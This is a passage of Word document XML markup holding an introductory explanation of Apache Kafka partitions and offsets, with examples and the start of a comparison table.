        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Key Points about Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63966C8B" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: A partition allows Kafka to distribute the data across multiple servers (brokers). Each partition can be hosted on different Kafka brokers, enabling Kafka to scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCEE937" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Distributed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Kafka topics are split into partitions to distribute the data and load among multiple brokers. Each partition is replicated across brokers to provide fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D598DB" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Partitions allow Kafka consumers to read messages in parallel. Each consumer in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be assigned one or more partitions to consume messages from, improving parallel processing and throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4555D40A" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Independent Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Each partition is essentially an independent log of messages. These logs are append-only, meaning messages are added sequentially to the end of a partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B44C3E" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DD9A61" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If you have a topic called orders, you can configure it to have multiple partitions (e.g., 3 partitions). Each partition will store a subset of the messages for that topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B782306" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Partition 0: Stores a subset of orders data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE48854" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Partition 1: Stores another subset of orders data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4ECE9E" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Partition 2: Stores yet another subset of orders data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16593D8C" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2. Offset in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789AD589" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a unique identifier for each message within a partition. It represents the position of a message within a partition and allows consumers to read messages in order. The offset is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>persistent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>monotonically increasing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FED304" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Key Points about Offsets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F2302C" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unique per Partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Offsets are unique within a partition, not across partitions. Each partition maintains its own sequence of offsets starting from 0 for the first message in that partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2EDB27" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Message Tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: The offset helps Kafka consumers to track which messages have been consumed and allows them to pick up from the last consumed message if needed. Consumers can commit their offsets to Kafka, allowing them to resume consumption from the last processed message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A58D6" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>No Ordering Across Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Offsets are ordered within a single partition. However, there is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no global offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> across all partitions, meaning that the offset is only meaningful within the context of a specific partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4ED246" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Consumer State</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: The offset is often used by consumers to maintain their position (state) in the message log. Consumers can choose to commit offsets (store them in Kafka or an external system), which allows them to resume from that point in the event of a failure or restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE59AAD" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6BB11E" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If a partition has 10 messages, the offsets for these messages will be from 0 to 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6176B6AB" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Message 1: Offset 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224AB82E" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Message 2: Offset 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2788926E" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Message 3: Offset 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D665802" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4B1A99" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Message 10: Offset 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E481934" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Consumers track their progress by keeping track of the last offset they processed. If a consumer processes messages up to offset 4, it can commit that offset and, if it fails or restarts, it can resume from offset 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFBAD84" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Key Differences Between Partition and Offse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1"/>
        <w:gridCol w:w="3711"/>
        <w:gridCol w:w="5302"/>
      </w:tblGrid>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="38080C38" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
